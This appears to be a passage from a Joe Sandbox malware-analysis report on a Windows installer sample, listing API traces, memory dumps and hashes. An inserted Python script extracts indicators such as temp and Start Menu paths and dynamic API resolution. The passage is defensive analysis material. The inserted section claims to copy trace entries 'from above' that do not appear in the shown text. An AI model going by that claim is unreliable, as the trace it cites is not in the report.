                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,?,00000000,?), ref: 0040160D
                                                                                          • Part of subcall function 004055C7: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,?), ref: 0040163C
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 00401631
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
                                                                                        • API String ID: 1892508949-720141496
                                                                                        • Opcode ID: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
                                                                                        • Instruction ID: 3a09c20382928311ba1d31a626229d1df209b5e1cddac7105c79dbf72218ebe6
                                                                                        • Opcode Fuzzy Hash: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
                                                                                        • Instruction Fuzzy Hash: B4112731508141EBCB212FB94D4197F36B0EA96325F28453FE4D2B23E2D63D49429A3F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406105,80000002), ref: 00405F07
                                                                                        • RegCloseKey.KERNELBASE(?,?,00406105,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 00405F12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue
                                                                                        • String ID: Call
                                                                                        • API String ID: 3356406503-1824292864
                                                                                        • Opcode ID: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                                                                        • Instruction ID: 897067c620da28adabf34c96f4b8630bfa599ba4fb7ce992f063a5310404d611
                                                                                        • Opcode Fuzzy Hash: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                                                                        • Instruction Fuzzy Hash: 6D015A7251020AABEF22CF61CC09FDB3BACEF55364F004026FA55A2190D278DA54CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
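The three entries above (the GetModuleHandleA/LoadLibraryExA/GetProcAddress/FreeLibrary body, the SetCurrentDirectoryA body, and the RegQueryValueExA/RegCloseKey body) are raw API traces in the report's "APIs" listing format. The script below is an added example and is not part of the Joe Sandbox report or its tooling: it parses lines in that format, separates direct calls from "Part of subcall function" entries, and lifts the indicators a responder would want from them: file paths (with the report's "Skipped:" prefix removed), registry key paths, the LoadLibrary-then-GetProcAddress run-time import resolution pattern, and directory operations under the user's Start Menu folder. The embedded trace is copied from the entries above; the path and registry heuristics, the set of directory APIs checked, and the flag wording are my own assumptions rather than Joe Sandbox conventions.

```python
"""Parse Joe Sandbox 'APIs' trace lines and extract responder-relevant indicators.

Added example; the regexes and heuristics below are assumptions, not Joe Sandbox's
own format specification. Verified against the lines copied from the report above.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Lines copied verbatim from the three function entries in the report above.
SAMPLE_TRACE = r"""
• GetModuleHandleA.KERNELBASE(00000000,?,?), ref: 00402095
  • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
  • Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
• LoadLibraryExA.KERNELBASE(00000000,?,?,?,?), ref: 004020A5
• GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
• FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,?,?), ref: 0040211F
• SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,?), ref: 0040163C
• RegCloseKey.KERNELBASE(?,?,00406105,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 00405F12
"""

# Report line shape: "• Func.MODULE(arg,arg,...), ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR: " for calls made by a callee.
_LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Heuristics (assumptions): a Windows path is "<drive>:\...", possibly behind the
# report's "Skipped: " marker; a registry path starts with a known hive-relative root.
_WIN_PATH_RE = re.compile(r"^(?:Skipped: )?([A-Za-z]:\\.+)$")
_REG_PATH_RE = re.compile(r"^(?:Software|SYSTEM|HKEY_[A-Z_]+)\\", re.IGNORECASE)
# Directory APIs whose path argument tells us where the sample is placing itself.
_DIR_APIS = ("SetCurrentDirectoryA", "CreateDirectoryA")


@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    args: tuple
    ref: str
    parent: Optional[str]  # address of the subcall's parent; None for a direct call


def parse_trace(text: str) -> list:
    """Turn the report's API listing into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # headings such as "APIs" / "Strings" are not calls
        raw = m["args"]
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m["func"], m["module"], args, m["ref"].upper(), m["parent"]))
    return calls


def extract_indicators(calls: list) -> dict:
    """Collect paths, registry keys and behavioural flags from parsed calls."""
    file_paths, reg_keys, flags = set(), set(), []
    for c in calls:
        for a in c.args:
            pm = _WIN_PATH_RE.match(a)
            if pm:
                file_paths.add(pm.group(1))
            elif _REG_PATH_RE.match(a):
                reg_keys.add(a)
    # Only the function's own (direct) calls describe its control flow; a
    # LoadLibrary* that precedes GetProcAddress means imports are resolved at
    # run time rather than through the PE import table.
    direct = [c.func for c in calls if c.parent is None]
    ll = [i for i, f in enumerate(direct) if f.startswith("LoadLibrary")]
    gpa = [i for i, f in enumerate(direct) if f == "GetProcAddress"]
    if ll and gpa and min(ll) < max(gpa):
        flags.append("dynamic API resolution (LoadLibrary -> GetProcAddress)")
    for c in calls:
        if c.func in _DIR_APIS and any("\\Start Menu\\" in a for a in c.args):
            flags.append(f"{c.func} targets a Start Menu path at ref {c.ref}")
    return {
        "file_paths": sorted(file_paths),
        "registry_keys": sorted(reg_keys),
        "flags": flags,
    }


if __name__ == "__main__":
    for key, val in extract_indicators(parse_trace(SAMPLE_TRACE)).items():
        print(key)
        for v in val:
            print("   ", v)
```

On the copied trace this yields the NSIS plugin path under %TEMP%\nsz7A32.tmp, the Start Menu\Koalitionens\Unconstraint\Opskolingers directory, the Software\Microsoft\Windows\CurrentVersion key, and both flags. Subcall lines are kept for indicator extraction but excluded from the control-flow check, so a LoadLibrary inside a callee does not by itself mark the parent as resolving imports dynamically.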

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                                                                        • Instruction ID: 81ce818a04e0c3cc04ce684d9a2a9ddfd009c22adec174195ca66df60ea86fc9
                                                                                        • Opcode Fuzzy Hash: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                                                                        • Instruction Fuzzy Hash: 69A14271E00229DBDF28CFA8C8446ADBBB1FF44305F15842AD916BB281C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                                                                        • Instruction ID: 08e1f0bd3e012b2653e952fb076f5459688999f8fa16d8000732ef154d800f7e
                                                                                        • Opcode Fuzzy Hash: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                                                                        • Instruction Fuzzy Hash: 53912370E00229CBEF28CF98C8547ADBBB1FF44305F15816AD956BB281C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                                                                        • Instruction ID: f9b0e14a80994b8e3cce9b061f2e265d206a391058c15f1564a8a9ac8da356b6
                                                                                        • Opcode Fuzzy Hash: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                                                                        • Instruction Fuzzy Hash: 80814571D04229DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB281C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                                                                        • Instruction ID: 64fae73fcf261b5a29c0697abf595a3f572636c651b32177eb72ec05398ad39b
                                                                                        • Opcode Fuzzy Hash: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                                                                        • Instruction Fuzzy Hash: 39817831D04229DBEF24CFA8D8447ADBBB0FB44305F21816AD856BB2C1C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                                                                        • Instruction ID: 51e77fe0f08f8d7ba03d7e1561fc41eb13955110d3fdee4e61b85cd17e52ee3e
                                                                                        • Opcode Fuzzy Hash: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                                                                        • Instruction Fuzzy Hash: C4712371D04229DBEF28CF98C8447ADBBB1FB44305F15806AD806BB281D7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                                                                        • Instruction ID: 3517892101dd69bd75e64738494877d03a8317e446f0652336487a17687a2cae
                                                                                        • Opcode Fuzzy Hash: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                                                                        • Instruction Fuzzy Hash: 53712571E04229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281D7789996DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                                                                        • Instruction ID: 34c5161cf4e4322df4c522de15ced9ded486b5ca7425d8c28145854c0c0886a7
                                                                                        • Opcode Fuzzy Hash: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                                                                        • Instruction Fuzzy Hash: 29714571D04229DBEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 004062DD: FindFirstFileA.KERNELBASE(76403410,00421558,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                                                                          • Part of subcall function 004062DD: FindClose.KERNEL32(00000000), ref: 004062F4
                                                                                        • lstrlenA.KERNEL32 ref: 004022F2
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 004022FC
                                                                                        • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                        • String ID:
                                                                                        • API String ID: 1486964399-0
                                                                                        • Opcode ID: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
                                                                                        • Instruction ID: e190a191dd6904399be212acf1c509ba618b837bf102c15a3da6bfbe2c681905
                                                                                        • Opcode Fuzzy Hash: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
                                                                                        • Instruction Fuzzy Hash: E6112A71E04318AACB00EFB98949A8EBBB9EF04318F10407BA405FB2D2D6BCD540CB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
                                                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402591
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Enum$CloseValue
                                                                                        • String ID:
                                                                                        • API String ID: 397863658-0
                                                                                        • Opcode ID: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
                                                                                        • Instruction ID: 35fd857a3e442691b1a787247be78dd7b49a46040516f967143c2ea575d22cfd
                                                                                        • Opcode Fuzzy Hash: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
                                                                                        • Instruction Fuzzy Hash: 5801B1B1905204FFE7119F659E89ABF7ABCEB40344F10443EF402B62C0D6B85E019669
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040250A
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
